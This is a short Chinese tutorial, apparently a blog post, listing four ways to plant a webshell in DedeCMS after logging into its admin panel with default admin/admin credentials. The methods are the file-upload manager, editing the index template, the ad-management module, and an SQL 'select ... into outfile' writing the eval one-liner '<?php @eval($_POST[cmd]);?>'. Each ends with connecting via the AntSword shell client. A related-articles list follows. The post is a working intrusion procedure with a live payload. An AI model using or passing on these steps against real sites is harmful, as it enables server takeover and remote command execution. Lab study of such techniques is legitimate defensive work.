dedecms(四种webshell姿势)

步骤一,登录网站

步骤二,进入后台

账号密码同为admin

姿势一,通过文件管理器上传WebShell

登陆到后台点击 【核心】--》【文件式管理器】【文件上传】 将准备好的一句话代码上传...OK

1.我们先创建一个1.php上传

2.上传之后我们双击1.php

3.我们进入1.php页面

4.蚁剑连接

姿势二,修改模板文件拿WebShell

与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下

1.我们修改一下index.htm,index.htm修改为php在第一段添加<?php phpinfo();?>点击保存

2.点击 【生成】【更新主页HTML】--》将主页位置修改为【/index.php】--》

点击 【生成静态】--》点击 【更新主页】 再次访问站点首页可发现变化...

3.访问/dede/../index.php

姿势三,后台任意命令执行拿WebShell

点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】

1.添加内容在广告内容添加一句话木马其他的谁便写

2.点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

3.访问/plus/ad_js.php?aid=1

4.蚁剑连接

姿势四,通过sql命令行工具获取webshell

点击【系统】【sql命令行工具】--》多行命令中输入select '<?php @eval($_POST[cmd]);?>' into outfile '+路径+创建文件名

1.输入命令

2.点击确定

3.确认有记录

相关推荐
码农炎可9 分钟前
K8S 黑魔法之如何从 Pod 拿到节点的命令行
安全·云原生·容器·kubernetes
百家方案29 分钟前
「下载」智慧园区及重点区域安全防范解决方案:框架统一规划,建设集成管理平台
大数据·人工智能·安全·智慧园区·数智化园区
龙智DevSecOps解决方案34 分钟前
龙智出席2024零跑智能汽车技术论坛,分享功能安全、需求管理、版本管理、代码扫描等DevSecOps落地实践
安全·汽车·devops·需求管理·版本控制·流程自动化·代码质量分析
hgdlip36 分钟前
ip归属地是什么意思?ip归属地是实时定位吗
网络·tcp/ip·web安全
科技小E2 小时前
NVR小程序接入平台EasyNVR视频监控技术如何助力餐饮行业实现明厨亮灶
安全·小程序·音视频·视频监控
网安-轩逸2 小时前
系统安全——可信计算
安全·系统安全
独行soc2 小时前
#渗透测试#漏洞利用#红蓝攻防#信息泄露漏洞#Tomcat信息泄露漏洞的利用
安全·web安全·面试·tomcat·漏洞挖掘·信息泄露·tomcat漏洞
网络安全-老纪4 小时前
web 浏览器安全攻防
前端·安全
云云3216 小时前
云手机:Instagram 账号管理新机遇
服务器·线性代数·安全·智能手机·矩阵
WTT00116 小时前
CTFshow-SSRF&文件上传
大数据·运维·网络·安全·web安全·ctf